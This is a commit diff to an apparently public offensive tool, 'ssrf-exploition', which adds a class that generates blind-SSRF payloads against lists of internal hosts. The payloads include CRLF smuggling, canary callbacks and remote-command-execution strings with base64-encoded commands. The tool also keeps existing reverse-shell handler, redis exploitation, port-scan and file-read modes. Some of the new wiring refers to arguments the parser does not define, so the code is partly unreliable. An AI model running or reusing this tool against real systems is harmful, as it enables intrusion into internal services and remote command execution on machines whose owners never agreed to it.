Update ssrf-exploition

errorfiathck · web-flow · commit bcb416215d1c · 2024-04-04T20:08:30.000+03:30
diff --git a/ssrf-exploition b/ssrf-exploition
@@ -12,6 +12,8 @@ import logging
 import re
 import json
 import socket
+import sys
+import base64
 
 execPath = os.getcwd()
 currentPath = os.path.dirname(__file__)
@@ -31,19 +33,31 @@ python3 ssrf-exploition.py -u https://example.com/ -m readfiles --rfile
 python3 ssrf-exploition.py -u https://example.com/ -m portscan --ssl --uagent "SSRFexploitAgent"
 python3 ssrf-exploition.py -u https://example.com/ -m redis --lhost=127.0.0.1 --lport=8080 -l 8080
 python3 ssrf-exploition.py -d data/request.txt -u https://example.com/ -m redis
+python3 ssrf-exploition.py -u https://example.com/ -cn subdomain.collaborator.net -m canary
+python3 ssrf-exploition.py -u https://example.com/ -cn https://subdomain.collaborator.net --mode canary -e 2
+python3 ssrf-exploition.py -f addresses.txt -c 'touch vrechson' --mode rce -Fl Jira
+python3 ssrf-exploition.py -f addresses.txt -c 'touch vrechson' --mode rce -p https -v
+
 
 '''
 parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawDescriptionHelpFormatter)
-parser.add_argument("--file", "-f", type=str, required=False, help= 'file of all URLs to be tested against SSRF')
+parser.add_argument("--file", "-f", metavar="TARGET_FILE", nargs="?", help="Set the target list containing internal domain names or IP addresses")
 parser.add_argument("--url", "-u", type=str, required=False, help= 'url to be tested against SSRF')
 parser.add_argument("--threads", "-n", type=int, required=False, help= 'number of threads for the tool')
 parser.add_argument("--output", "-o", type=str, required=False, help='output file path')
 parser.add_argument("--data", "-d", action="store", dest="reqfile", help="SSRF Request File")
+parser.add_argument("--protocol", "-p", metavar="PROTOCOL", nargs="?", default="http://", help="Set the internal address protocol.\ndefault is http://")
 parser.add_argument("--moudle", "-m", action="store", dest="moudles", help="SSRF Moudles to enable")
+parser.add_argument("--canary", "-cn", metavar="CANARY_ADDRESS", nargs="?", help="Set canary address to confirm internal services")
+parser.add_argument("--command", "-c", metavar="COMMAND", nargs="?", default="", help="Set the command to be executed")
+parser.add_argument("--encode", "-e", metavar="ENCODE_LEVEL", nargs="?", default="1", help="Set the payload's URLencode level,ex:\n-e 0 will not encode the payload\n-e 2 will double URLencode the output")
+parser.add_argument("--filter", "-Fl", metavar="FILTER", nargs="*", default=["shellshock"], help="Filter category, framework or a specific payload from the results\ndefault: exclude Shellshock payloads")
 parser.add_argument("--handler", "-l", action="store", dest="handler", help="Start an handler for a reverse shell" )
+parser.add_argument("--OAuth", "--ar", help="Aurhotization request URL ending with redirect_uri=", required=False)
 parser.add_argument("--oneshot", "-t", action='store_true', help='fuzz with only one basic payload - to be activated in case of time constraints')
 parser.add_argument("--rfiles", "-r", action="store", dest="targetfiles", help="Files to read with readfiles moudle" )
 parser.add_argument("--verbose", "-v", action='store_true', help='activate verbose mode' )
+parser.add_argument("--mode", metavar="MODE", nargs="?", default="canary", help="There are currently three supported modes:\ncanary (deafult mode: generate canary payloads)\nrce (generate payloads that can lead to RCE)\nall (generates RCE and Canary payloads)")
 parser.add_argument("--lhost", action="store", dest="lhost", help="LHOST reverse shell")
 parser.add_argument("--lport", action="store", dest="lport", help="LPORT reverse shell")
 parser.add_argument("--ssl",   action ='store', dest='ssl', help="Use HTTPS without verification", )
@@ -78,6 +92,7 @@ regexParams = regex.compile('(?<=(access|dbg|debug|edit|grant|clone|exec|execute
 
 extractInteractionServerURL = "(?<=] )([a-z0-9][a-z0-9][a-z0-9].*)"
 
+
 class Handler(threading.Thread):
 
     def __init__(self, host, port):
@@ -274,6 +289,85 @@ class Requester(object):
             text += data + "=" + self.data[data] + "&"
         return text[:-1]
 
+class Gun:
+    def __init__(self, target, file, command, encode_level, protocol, canary, mode, verbose, _filter):
+
+        self._targets = []
+
+        if target is not None:
+            self._targets.append(self.add_protocol(target, protocol))
+        else:
+            with open(file) as f:
+                for line in f:
+                    line = line.strip()
+                    self._targets.append(self.add_protocol(str(line), "http"))
+
+        if canary is not None:
+            self._canary = self.add_protocol(canary, protocol)
+        else:
+            self._canary = ''
+
+        self._encode_level = int(encode_level)
+        self._filter = _filter
+
+        if mode == "canary":
+            self._filter.append('http')
+            self._filter.append('gopher')
+        elif mode == "rce":
+            self._filter.append('canaries')
+
+        self._command = str(command)
+        self._verbose = verbose
+        self._crlf = "{canary}/ HTTP/1.1{newline}Connection:keep-alive{newline}Host:{canary_host}{newline}Content-Length: 1{newline}{newline}1{newline}"
+
+    def reload(self):
+        for line in self._targets:
+            
+            # format CRLF payloads
+            self._crlf = self._crlf.format(canary = line, newline = '\\r\\n', canary_host = urllib.parse.urlparse(line).netloc)
+            self.trigger(line)
+    
+    def trigger(self, target):
+        payload_file = open('payloads/blind-ssrf-payloads.json') # remember to add dir here
+        data = json.load(payload_file)
+
+        for category in data['categories']:
+            if category in self._filter:
+                continue
+            if self._verbose:
+                print("[{}]:".format(category))
+            for framework in data['categories'][category]:
+                if framework in self._filter:
+                    continue
+                if self._verbose:
+                    print("     [{}]:".format(framework))
+                for payload in data['categories'][category][framework]:
+                    if payload in self._filter:
+                        continue
+                    address = data['categories'][category][framework][payload]  \
+                    .format(target_addr = target, canary_addr = self._canary, 
+                    canary_urlencoded =  urllib.parse.quote(self._canary), crlf = self._crlf, newline = '\\r\\n',
+                    target_host = urllib.parse.urlparse(target), command = self._command, command_b64encoded = base64.b64encode((self._command).encode('UTF-8')).decode('UTF-8'))
+
+                    for i in range(self._encode_level):
+                        address = urllib.parse.quote(address)
+
+                    if self._verbose:    
+                        print("             [{}]:\n{}".format(payload, address))
+                    else:
+                        print("{}".format(address))
+    
+    def add_protocol(self, target, protocol):
+        if target.endswith("/"):
+            target = target[:-1]
+        if "//" not in target:
+            if "//" not in protocol:
+                target = protocol + "://" + target
+            else:
+                target = protocol + target
+
+        return target
+
 def getFileSize(fileID):
     interactionLogs = open(f"output/threadsLogs/interaction-logs{fileID}.txt", "r")
     return len(interactionLogs.read())
@@ -460,7 +554,28 @@ def main():
             for thread in workingThreads:
                 thread.join()
     outputFile.close()
+    args_t = args()
+    _command = ''
+
+    if args_t.mode and args_t.mode != "canary":
+        if not args_t.command:
+            print('the argument -c/--command is required to generate RCE payloads')
+            exit()
+        else:
+            if int(args_t.encode) > -1:
+                _command = urllib.parse.quote(args_t.command)
+            else:
+                _command = args_t.command
+    
+    if args_t.mode and args_t.mode == "canary":
+        if not args_t.canary:
+            print('the argument -cn/--canary is required to generate canary payloads')
+            exit()
     
+    gun = Gun(args_t.target, args_t.target_list, _command,
+    args_t.encode, args_t.protocol, args_t.canary, args_t.mode, args_t.verbose, args_t.filter)
+
+    gun.reload()
 
 
 if __name__ == '__main__':
@@ -479,3 +594,4 @@ if __name__ == '__main__':
     logging.addLevelName( logging.WARNING, "\033[1;31m%s\033[1;0m" % logging.getLevelName(logging.WARNING))
     logging.addLevelName( logging.ERROR, "\033[1;41m%s\033[1;0m" % logging.getLevelName(logging.ERROR))
 
+
